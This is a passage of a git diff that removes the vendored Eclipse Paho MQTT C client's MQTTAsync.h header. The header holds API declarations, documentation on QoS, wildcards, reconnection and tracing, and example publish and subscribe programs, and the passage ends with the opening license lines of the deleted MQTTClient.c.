-    * Can be set to NULL, in which case no indication of unsuccessful
-    * completion will be received.
-    */
-	MQTTAsync_onFailure* onFailure;
-	/**
-	* A pointer to any application-specific context. The
-    * the <i>context</i> pointer is passed to success or failure callback functions to
-    * provide access to the context information in the callback.
-    */
-	void* context;
-} MQTTAsync_disconnectOptions;
-
-#define MQTTAsync_disconnectOptions_initializer { {'M', 'Q', 'T', 'D'}, 0, 0, NULL, NULL, NULL }
-
-
-/**
-  * This function attempts to disconnect the client from the MQTT
-  * server. In order to allow the client time to complete handling of messages
-  * that are in-flight when this function is called, a timeout period is
-  * specified. When the timeout period has expired, the client disconnects even
-  * if there are still outstanding message acknowledgements.
-  * The next time the client connects to the same server, any QoS 1 or 2
-  * messages which have not completed will be retried depending on the
-  * cleansession settings for both the previous and the new connection (see
-  * MQTTAsync_connectOptions.cleansession and MQTTAsync_connect()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param options The client delays disconnection for up to this time (in
-  * milliseconds) in order to allow in-flight message transfers to complete.
-  * @return ::MQTTASYNC_SUCCESS if the client successfully disconnects from
-  * the server. An error code is returned if the client was unable to disconnect
-  * from the server
-  */
-DLLExport int MQTTAsync_disconnect(MQTTAsync handle, const MQTTAsync_disconnectOptions* options);
-
-
-/**
-  * This function allows the client application to test whether or not a
-  * client is currently connected to the MQTT server.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @return Boolean true if the client is connected, otherwise false.
-  */
-DLLExport int MQTTAsync_isConnected(MQTTAsync handle);
-
-
-/**
-  * This function attempts to subscribe a client to a single topic, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for the subscription
-  * (see also MQTTAsync_subscribeMany()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param topic The subscription topic, which may include wildcards.
-  * @param qos The requested quality of service for the subscription.
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscription.
-  */
-DLLExport int MQTTAsync_subscribe(MQTTAsync handle, const char* topic, int qos, MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function attempts to subscribe a client to a list of topics, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for each topic (see also MQTTAsync_subscribe()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param count The number of topics for which the client is requesting
-  * subscriptions.
-  * @param topic An array (of length <i>count</i>) of pointers to
-  * topics, each of which may include wildcards.
-  * @param qos An array (of length <i>count</i>) of @ref qos
-  * values. qos[n] is the requested QoS for topic[n].
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscriptions.
-  */
-DLLExport int MQTTAsync_subscribeMany(MQTTAsync handle, int count, char* const* topic, int* qos, MQTTAsync_responseOptions* response);
-
-/**
-  * This function attempts to remove an existing subscription made by the
-  * specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param topic The topic for the subscription to be removed, which may
-  * include wildcards (see @ref wildcard).
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscription is removed.
-  * An error code is returned if there was a problem removing the
-  * subscription.
-  */
-DLLExport int MQTTAsync_unsubscribe(MQTTAsync handle, const char* topic, MQTTAsync_responseOptions* response);
-
-/**
-  * This function attempts to remove existing subscriptions to a list of topics
-  * made by the specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param count The number subscriptions to be removed.
-  * @param topic An array (of length <i>count</i>) of pointers to the topics of
-  * the subscriptions to be removed, each of which may include wildcards.
-  * @param response A pointer to a response options structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the subscriptions are removed.
-  * An error code is returned if there was a problem removing the subscriptions.
-  */
-DLLExport int MQTTAsync_unsubscribeMany(MQTTAsync handle, int count, char* const* topic, MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * ::MQTTAsync_sendMessage()). An ::MQTTAsync_token is issued when
-  * this function returns successfully. If the client application needs to
-  * test for successful delivery of messages, a callback should be set
-  * (see ::MQTTAsync_onSuccess() and ::MQTTAsync_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param destinationName The topic associated with this message.
-  * @param payloadlen The length of the payload in bytes.
-  * @param payload A pointer to the byte array payload of the message.
-  * @param qos The @ref qos of the message.
-  * @param retained The retained flag for the message.
-  * @param response A pointer to an ::MQTTAsync_responseOptions structure. Used to set callback functions.
-  * This is optional and can be set to NULL.
-  * @return ::MQTTASYNC_SUCCESS if the message is accepted for publication.
-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTAsync_send(MQTTAsync handle, const char* destinationName, int payloadlen, void* payload, int qos, int retained,
-																 MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * MQTTAsync_publish()). An ::MQTTAsync_token is issued when
-  * this function returns successfully. If the client application needs to
-  * test for successful delivery of messages, a callback should be set
-  * (see ::MQTTAsync_onSuccess() and ::MQTTAsync_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param destinationName The topic associated with this message.
-  * @param msg A pointer to a valid MQTTAsync_message structure containing
-  * the payload and attributes of the message to be published.
-  * @param response A pointer to an ::MQTTAsync_responseOptions structure. Used to set callback functions.
-  * @return ::MQTTASYNC_SUCCESS if the message is accepted for publication.
-  * An error code is returned if there was a problem accepting the message.
-  */
-DLLExport int MQTTAsync_sendMessage(MQTTAsync handle, const char* destinationName, const MQTTAsync_message* msg, MQTTAsync_responseOptions* response);
-
-
-/**
-  * This function sets a pointer to an array of tokens for
-  * messages that are currently in-flight (pending completion).
-  *
-  * <b>Important note:</b> The memory used to hold the array of tokens is
-  * malloc()'d in this function. The client application is responsible for
-  * freeing this memory when it is no longer required.
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param tokens The address of a pointer to an ::MQTTAsync_token.
-  * When the function returns successfully, the pointer is set to point to an
-  * array of tokens representing messages pending completion. The last member of
-  * the array is set to -1 to indicate there are no more tokens. If no tokens
-  * are pending, the pointer is set to NULL.
-  * @return ::MQTTASYNC_SUCCESS if the function returns successfully.
-  * An error code is returned if there was a problem obtaining the list of
-  * pending tokens.
-  */
-DLLExport int MQTTAsync_getPendingTokens(MQTTAsync handle, MQTTAsync_token **tokens);
-
-/**
- * Tests whether a request corresponding to a token is complete.
- *
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param token An ::MQTTAsync_token associated with a request.
- * @return 1 if the request has been completed, 0 if not.
- */
-#define MQTTASYNC_TRUE 1
-DLLExport int MQTTAsync_isComplete(MQTTAsync handle, MQTTAsync_token token);
-
-
-/**
- * Waits for a request corresponding to a token to complete.
- *
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param token An ::MQTTAsync_token associated with a request.
- * @param timeout the maximum time to wait for completion, in milliseconds
- * @return ::MQTTASYNC_SUCCESS if the request has been completed in the time allocated,
- *  ::MQTTASYNC_FAILURE if not.
- */
-DLLExport int MQTTAsync_waitForCompletion(MQTTAsync handle, MQTTAsync_token token, unsigned long timeout);
-
-
-/**
-  * This function frees memory allocated to an MQTT message, including the
-  * additional memory allocated to the message payload. The client application
-  * calls this function when the message has been fully processed. <b>Important
-  * note:</b> This function does not free the memory allocated to a message
-  * topic string. It is the responsibility of the client application to free
-  * this memory using the MQTTAsync_free() library function.
-  * @param msg The address of a pointer to the ::MQTTAsync_message structure
-  * to be freed.
-  */
-DLLExport void MQTTAsync_freeMessage(MQTTAsync_message** msg);
-
-/**
-  * This function frees memory allocated by the MQTT C client library, especially the
-  * topic name. This is needed on Windows when the client libary and application
-  * program have been compiled with different versions of the C compiler.  It is
-  * thus good policy to always use this function when freeing any MQTT C client-
-  * allocated memory.
-  * @param ptr The pointer to the client library storage to be freed.
-  */
-DLLExport void MQTTAsync_free(void* ptr);
-
-/**
-  * This function frees the memory allocated to an MQTT client (see
-  * MQTTAsync_create()). It should be called when the client is no longer
-  * required.
-  * @param handle A pointer to the handle referring to the ::MQTTAsync
-  * structure to be freed.
-  */
-DLLExport void MQTTAsync_destroy(MQTTAsync* handle);
-
-
-
-enum MQTTASYNC_TRACE_LEVELS
-{
-	MQTTASYNC_TRACE_MAXIMUM = 1,
-	MQTTASYNC_TRACE_MEDIUM,
-	MQTTASYNC_TRACE_MINIMUM,
-	MQTTASYNC_TRACE_PROTOCOL,
-	MQTTASYNC_TRACE_ERROR,
-	MQTTASYNC_TRACE_SEVERE,
-	MQTTASYNC_TRACE_FATAL,
-};
-
-
-/**
-  * This function sets the level of trace information which will be
-  * returned in the trace callback.
-  * @param level the trace level required
-  */
-DLLExport void MQTTAsync_setTraceLevel(enum MQTTASYNC_TRACE_LEVELS level);
-
-
-/**
-  * This is a callback function prototype which must be implemented if you want
-  * to receive trace information.
-  * @param level the trace level of the message returned
-  * @param meesage the trace message.  This is a pointer to a static buffer which
-  * will be overwritten on each call.  You must copy the data if you want to keep
-  * it for later.
-  */
-typedef void MQTTAsync_traceCallback(enum MQTTASYNC_TRACE_LEVELS level, char* message);
-
-/**
-  * This function sets the trace callback if needed.  If set to NULL,
-  * no trace information will be returned.  The default trace level is
-  * MQTTASYNC_TRACE_MINIMUM.
-  * @param callback a pointer to the function which will handle the trace information
-  */
-DLLExport void MQTTAsync_setTraceCallback(MQTTAsync_traceCallback* callback);
-
-
-typedef struct
-{
-	const char* name;
-	const char* value;
-} MQTTAsync_nameValue;
-
-/**
-  * This function returns version information about the library.
-  * no trace information will be returned.  The default trace level is
-  * MQTTASYNC_TRACE_MINIMUM
-  * @return an array of strings describing the library.  The last entry is a NULL pointer.
-  */
-DLLExport MQTTAsync_nameValue* MQTTAsync_getVersionInfo(void);
-
-
-/**
-  * @cond MQTTAsync_main
-  * @page async Threading
-  * The client application runs on several threads.
-  * Processing of handshaking and maintaining
-  * the network connection is performed in the background.
-  * This API is thread safe: functions may be called by multiple application
-  * threads.
-  * Notifications of status and message reception are provided to the client
-  * application using callbacks registered with the library by the call to
-  * MQTTAsync_setCallbacks() (see MQTTAsync_messageArrived(),
-  * MQTTAsync_connectionLost() and MQTTAsync_deliveryComplete()).
-  * In addition, some functions allow success and failure callbacks to be set
-  * for individual requests, in the ::MQTTAsync_responseOptions structure.  Applications
-  * can be written as a chain of callback functions. Note that it is a theoretically
-  * possible but unlikely event, that a success or failure callback could be called
-  * before function requesting the callback has returned.  In this case the token
-  * delivered in the callback would not yet be known to the application program (see
-  * Race condition for MQTTAsync_token in MQTTAsync.c
-  * https://bugs.eclipse.org/bugs/show_bug.cgi?id=444093)
-  *
-  * @page auto_reconnect Automatic Reconnect
-  * The ability for the client library to reconnect automatically in the event
-  * of a connection failure was added in 1.1.  The connection lost callback
-  * allows a flexible response to the loss of a connection, so almost any
-  * behaviour can be implemented in that way.  Automatic reconnect does have the
-  * advantage of being a little simpler to use.
-  *
-  * To switch on automatic reconnect, the connect options field
-  * automaticReconnect should be set to non-zero.  The minimum and maximum times
-  * before the next connection attempt can also be set, the defaults being 1 and
-  * 60 seconds.  At each failure to reconnect, the retry interval is doubled until
-  * the maximum value is reached, and there it stays until the connection is
-  * successfully re-established whereupon it is reset.
-  *
-  * When a reconnection attempt is successful, the ::MQTTAsync_connected callback
-  * function is invoked, if set by calling ::MQTTAsync_setConnected.  This allows
-  * the application to take any actions needed, such as amending subscriptions.
-  *
-  * @page offline_publish Publish While Disconnected
-  * This feature was not originally available because with persistence enabled,
-  * messages could be stored locally without ever knowing if they could be sent.
-  * The client application could have created the client with an erroneous broker
-  * address or port for instance.
-  *
-  * To enable messages to be published when the application is disconnected
-  * ::MQTTAsync_createWithOptions must be used instead of ::MQTTAsync_create to
-  * create the client object.  The ::createOptions field sendWhileDisconnected
-  * must be set to non-zero, and the maxBufferedMessages field set as required -
-  * the default being 100.
-  *
-  * ::MQTTAsync_getPendingTokens can be called to return the ids of the messages
-  * waiting to be sent, or for which the sending process has not completed.
-  *
-  * @page wildcard Subscription wildcards
-  * Every MQTT message includes a topic that classifies it. MQTT servers use
-  * topics to determine which subscribers should receive messages published to
-  * the server.
-  *
-  * Consider the server receiving messages from several environmental sensors.
-  * Each sensor publishes its measurement data as a message with an associated
-  * topic. Subscribing applications need to know which sensor originally
-  * published each received message. A unique topic is thus used to identify
-  * each sensor and measurement type. Topics such as SENSOR1TEMP,
-  * SENSOR1HUMIDITY, SENSOR2TEMP and so on achieve this but are not very
-  * flexible. If additional sensors are added to the system at a later date,
-  * subscribing applications must be modified to receive them.
-  *
-  * To provide more flexibility, MQTT supports a hierarchical topic namespace.
-  * This allows application designers to organize topics to simplify their
-  * management. Levels in the hierarchy are delimited by the '/' character,
-  * such as SENSOR/1/HUMIDITY. Publishers and subscribers use these
-  * hierarchical topics as already described.
-  *
-  * For subscriptions, two wildcard characters are supported:
-  * <ul>
-  * <li>A '#' character represents a complete sub-tree of the hierarchy and
-  * thus must be the last character in a subscription topic string, such as
-  * SENSOR/#. This will match any topic starting with SENSOR/, such as
-  * SENSOR/1/TEMP and SENSOR/2/HUMIDITY.</li>
-  * <li> A '+' character represents a single level of the hierarchy and is
-  * used between delimiters. For example, SENSOR/+/TEMP will match
-  * SENSOR/1/TEMP and SENSOR/2/TEMP.</li>
-  * </ul>
-  * Publishers are not allowed to use the wildcard characters in their topic
-  * names.
-  *
-  * Deciding on your topic hierarchy is an important step in your system design.
-  *
-  * @page qos Quality of service
-  * The MQTT protocol provides three qualities of service for delivering
-  * messages between clients and servers: "at most once", "at least once" and
-  * "exactly once".
-  *
-  * Quality of service (QoS) is an attribute of an individual message being
-  * published. An application sets the QoS for a specific message by setting the
-  * MQTTAsync_message.qos field to the required value.
-  *
-  * A subscribing client can set the maximum quality of service a server uses
-  * to send messages that match the client subscriptions. The
-  * MQTTAsync_subscribe() and MQTTAsync_subscribeMany() functions set this
-  * maximum. The QoS of a message forwarded to a subscriber thus might be
-  * different to the QoS given to the message by the original publisher.
-  * The lower of the two values is used to forward a message.
-  *
-  * The three levels are:
-  *
-  * <b>QoS0, At most once:</b> The message is delivered at most once, or it
-  * may not be delivered at all. Its delivery across the network is not
-  * acknowledged. The message is not stored. The message could be lost if the
-  * client is disconnected, or if the server fails. QoS0 is the fastest mode of
-  * transfer. It is sometimes called "fire and forget".
-  *
-  * The MQTT protocol does not require servers to forward publications at QoS0
-  * to a client. If the client is disconnected at the time the server receives
-  * the publication, the publication might be discarded, depending on the
-  * server implementation.
-  *
-  * <b>QoS1, At least once:</b> The message is always delivered at least once.
-  * It might be delivered multiple times if there is a failure before an
-  * acknowledgment is received by the sender. The message must be stored
-  * locally at the sender, until the sender receives confirmation that the
-  * message has been published by the receiver. The message is stored in case
-  * the message must be sent again.
-  *
-  * <b>QoS2, Exactly once:</b> The message is always delivered exactly once.
-  * The message must be stored locally at the sender, until the sender receives
-  * confirmation that the message has been published by the receiver. The
-  * message is stored in case the message must be sent again. QoS2 is the
-  * safest, but slowest mode of transfer. A more sophisticated handshaking
-  * and acknowledgement sequence is used than for QoS1 to ensure no duplication
-  * of messages occurs.
-
-
-  * @page publish Publication example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientPub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
- 		finished = 1;
-	}
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	finished = 1;
-}
-
-
-void onSend(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_disconnectOptions opts = MQTTAsync_disconnectOptions_initializer;
-	int rc;
-
-	printf("Message with token value %d delivery confirmed\n", response->token);
-
-	opts.onSuccess = onDisconnect;
-	opts.context = client;
-
-	if ((rc = MQTTAsync_disconnect(client, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-
-	opts.onSuccess = onSend;
-	opts.context = client;
-
-	pubmsg.payload = PAYLOAD;
-	pubmsg.payloadlen = strlen(PAYLOAD);
-	pubmsg.qos = QOS;
-	pubmsg.retained = 0;
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_sendMessage(client, TOPIC, &pubmsg, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start sendMessage, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	MQTTAsync_token token;
-	int rc;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, NULL, connlost, NULL, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	printf("Waiting for publication of %s\n"
-         "on topic %s for client with ClientID: %s\n",
-         PAYLOAD, TOPIC, CLIENTID);
-	while (!finished)
-		#if defined(WIN32) || defined(WIN64)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
-
-  * @endcode
-  * @page subscribe Subscription example
-@code
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include "MQTTAsync.h"
-
-#define ADDRESS     "tcp://localhost:1883"
-#define CLIENTID    "ExampleClientSub"
-#define TOPIC       "MQTT Examples"
-#define PAYLOAD     "Hello World!"
-#define QOS         1
-#define TIMEOUT     10000L
-
-volatile MQTTAsync_token deliveredtoken;
-
-int disc_finished = 0;
-int subscribed = 0;
-int finished = 0;
-
-void connlost(void *context, char *cause)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	int rc;
-
-	printf("\nConnection lost\n");
-	printf("     cause: %s\n", cause);
-
-	printf("Reconnecting\n");
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-	    finished = 1;
-	}
-}
-
-
-int msgarrvd(void *context, char *topicName, int topicLen, MQTTAsync_message *message)
-{
-    int i;
-    char* payloadptr;
-
-    printf("Message arrived\n");
-    printf("     topic: %s\n", topicName);
-    printf("   message: ");
-
-    payloadptr = message->payload;
-    for(i=0; i<message->payloadlen; i++)
-    {
-        putchar(*payloadptr++);
-    }
-    putchar('\n');
-    MQTTAsync_freeMessage(&message);
-    MQTTAsync_free(topicName);
-    return 1;
-}
-
-
-void onDisconnect(void* context, MQTTAsync_successData* response)
-{
-	printf("Successful disconnection\n");
-	disc_finished = 1;
-}
-
-
-void onSubscribe(void* context, MQTTAsync_successData* response)
-{
-	printf("Subscribe succeeded\n");
-	subscribed = 1;
-}
-
-void onSubscribeFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Subscribe failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnectFailure(void* context, MQTTAsync_failureData* response)
-{
-	printf("Connect failed, rc %d\n", response ? response->code : 0);
-	finished = 1;
-}
-
-
-void onConnect(void* context, MQTTAsync_successData* response)
-{
-	MQTTAsync client = (MQTTAsync)context;
-	MQTTAsync_responseOptions opts = MQTTAsync_responseOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	int rc;
-
-	printf("Successful connection\n");
-
-	printf("Subscribing to topic %s\nfor client %s using QoS%d\n\n"
-           "Press Q<Enter> to quit\n\n", TOPIC, CLIENTID, QOS);
-	opts.onSuccess = onSubscribe;
-	opts.onFailure = onSubscribeFailure;
-	opts.context = client;
-
-	deliveredtoken = 0;
-
-	if ((rc = MQTTAsync_subscribe(client, TOPIC, QOS, &opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start subscribe, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-}
-
-
-int main(int argc, char* argv[])
-{
-	MQTTAsync client;
-	MQTTAsync_connectOptions conn_opts = MQTTAsync_connectOptions_initializer;
-	MQTTAsync_disconnectOptions disc_opts = MQTTAsync_disconnectOptions_initializer;
-	MQTTAsync_message pubmsg = MQTTAsync_message_initializer;
-	MQTTAsync_token token;
-	int rc;
-	int ch;
-
-	MQTTAsync_create(&client, ADDRESS, CLIENTID, MQTTCLIENT_PERSISTENCE_NONE, NULL);
-
-	MQTTAsync_setCallbacks(client, NULL, connlost, msgarrvd, NULL);
-
-	conn_opts.keepAliveInterval = 20;
-	conn_opts.cleansession = 1;
-	conn_opts.onSuccess = onConnect;
-	conn_opts.onFailure = onConnectFailure;
-	conn_opts.context = client;
-	if ((rc = MQTTAsync_connect(client, &conn_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start connect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
-
-	while	(!subscribed)
-		#if defined(WIN32) || defined(WIN64)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-	if (finished)
-		goto exit;
-
-	do
-	{
-		ch = getchar();
-	} while (ch!='Q' && ch != 'q');
-
-	disc_opts.onSuccess = onDisconnect;
-	if ((rc = MQTTAsync_disconnect(client, &disc_opts)) != MQTTASYNC_SUCCESS)
-	{
-		printf("Failed to start disconnect, return code %d\n", rc);
-		exit(EXIT_FAILURE);
-	}
- 	while	(!disc_finished)
-		#if defined(WIN32) || defined(WIN64)
-			Sleep(100);
-		#else
-			usleep(10000L);
-		#endif
-
-exit:
-	MQTTAsync_destroy(&client);
- 	return rc;
-}
-
-  * @endcode
-* @page tracing Tracing
-  *
-  * Runtime tracing can be controlled by environment variables or API calls.
-  *
-  * #### Environment variables
-  *
-  * Tracing is switched on by setting the MQTT_C_CLIENT_TRACE environment variable.
-  * A value of ON, or stdout, prints to stdout, any other value is interpreted as a file name to use.
-  *
-  * The amount of trace detail is controlled with the MQTT_C_CLIENT_TRACE_LEVEL environment
-  * variable - valid values are ERROR, PROTOCOL, MINIMUM, MEDIUM and MAXIMUM
-  * (from least to most verbose).
-  *
-  * The variable MQTT_C_CLIENT_TRACE_MAX_LINES limits the number of lines of trace that are output
-  * to a file.  Two files are used at most, when they are full, the last one is overwritten with the
-  * new trace entries.  The default size is 1000 lines.
-  *
-  * #### Trace API calls
-  *
-  * MQTTAsync_traceCallback() is used to set a callback function which is called whenever trace
-  * information is available.  This will be the same information as that printed if the
-  * environment variables were used to control the trace.
-  *
-  * The MQTTAsync_setTraceLevel() calls is used to set the maximum level of trace entries that will be
-  * passed to the callback function.  The levels are:
-  * 1. ::MQTTASYNC_TRACE_MAXIMUM
-  * 2. ::MQTTASYNC_TRACE_MEDIUM
-  * 3. ::MQTTASYNC_TRACE_MINIMUM
-  * 4. ::MQTTASYNC_TRACE_PROTOCOL
-  * 5. ::MQTTASYNC_TRACE_ERROR
-  * 6. ::MQTTASYNC_TRACE_SEVERE
-  * 7. ::MQTTASYNC_TRACE_FATAL
-  *
-  * Selecting ::MQTTASYNC_TRACE_MAXIMUM will cause all trace entries at all levels to be returned.
-  * Choosing ::MQTTASYNC_TRACE_ERROR will cause ERROR, SEVERE and FATAL trace entries to be returned
-  * to the callback function.
-  *
-  * ### MQTT Packet Tracing
-  *
-  * A feature that can be very useful is printing the MQTT packets that are sent and received.  To
-  * achieve this, use the following environment variable settings:
-  * @code
-    MQTT_C_CLIENT_TRACE=ON
-    MQTT_C_CLIENT_TRACE_LEVEL=PROTOCOL
-  * @endcode
-  * The output you should see looks like this:
-  * @code
-    20130528 155936.813 3 stdout-subscriber -> CONNECT cleansession: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- CONNACK rc: 0
-    20130528 155936.813 3 stdout-subscriber -> SUBSCRIBE msgid: 1 (0)
-    20130528 155936.813 3 stdout-subscriber <- SUBACK msgid: 1
-    20130528 155941.818 3 stdout-subscriber -> DISCONNECT (0)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. socket number
-  * 4. client id
-  * 5. direction (-> from client to server, <- from server to client)
-  * 6. packet details
-  *
-  * ### Default Level Tracing
-  *
-  * This is an extract of a default level trace of a call to connect:
-  * @code
-    19700101 010000.000 (1152206656) (0)> MQTTClient_connect:893
-    19700101 010000.000 (1152206656)  (1)> MQTTClient_connectURI:716
-    20130528 160447.479 Connecting to serverURI localhost:1883
-    20130528 160447.479 (1152206656)   (2)> MQTTProtocol_connect:98
-    20130528 160447.479 (1152206656)    (3)> MQTTProtocol_addressPort:48
-    20130528 160447.479 (1152206656)    (3)< MQTTProtocol_addressPort:73
-    20130528 160447.479 (1152206656)    (3)> Socket_new:599
-    20130528 160447.479 New socket 4 for localhost, port 1883
-    20130528 160447.479 (1152206656)     (4)> Socket_addSocket:163
-    20130528 160447.479 (1152206656)      (5)> Socket_setnonblocking:73
-    20130528 160447.479 (1152206656)      (5)< Socket_setnonblocking:78 (0)
-    20130528 160447.479 (1152206656)     (4)< Socket_addSocket:176 (0)
-    20130528 160447.479 (1152206656)     (4)> Socket_error:95
-    20130528 160447.479 (1152206656)     (4)< Socket_error:104 (115)
-    20130528 160447.479 Connect pending
-    20130528 160447.479 (1152206656)    (3)< Socket_new:683 (115)
-    20130528 160447.479 (1152206656)   (2)< MQTTProtocol_connect:131 (115)
-  * @endcode
-  * where the fields are:
-  * 1. date
-  * 2. time
-  * 3. thread id
-  * 4. function nesting level
-  * 5. function entry (>) or exit (<)
-  * 6. function name : line of source code file
-  * 7. return value (if there is one)
-  *
-  * ### Memory Allocation Tracing
-  *
-  * Setting the trace level to maximum causes memory allocations and frees to be traced along with
-  * the default trace entries, with messages like the following:
-  * @code
-    20130528 161819.657 Allocating 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 177 ptr 0x179f930
-
-    20130528 161819.657 Freeing 16 bytes in heap at file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c line 201, heap use now 896 bytes
-  * @endcode
-  * When the last MQTT client object is destroyed, if the trace is being recorded
-  * and all memory allocated by the client library has not been freed, an error message will be
-  * written to the trace.  This can help with fixing memory leaks.  The message will look like this:
-  * @code
-    20130528 163909.208 Some memory not freed at shutdown, possible memory leak
-    20130528 163909.208 Heap scan start, total 880 bytes
-    20130528 163909.208 Heap element size 32, line 354, file /home/icraggs/workspaces/mqrtc/mqttv3c/src/MQTTPacket.c, ptr 0x260cb00
-    20130528 163909.208   Content
-    20130528 163909.209 Heap scan end
-  * @endcode
-  * @endcond
-  */
-
-
-#endif
-
-#ifdef __cplusplus
-     }
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTClient.c b/thirdparty/paho.mqtt.c/src/MQTTClient.c
deleted file mode 100644
index abeaab0..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTClient.c
+++ /dev/null
@@ -1,2102 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs - bug 384016 - segv setting will message
- *    Ian Craggs - bug 384053 - v1.0.0.7 - stop MQTTClient_receive on socket error
- *    Ian Craggs, Allan Stockdill-Mander - add ability to connect with SSL
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - fix for bug 413429 - connectionLost not called
- *    Ian Craggs - fix for bug 421103 - trying to write to same socket, in publish/retries
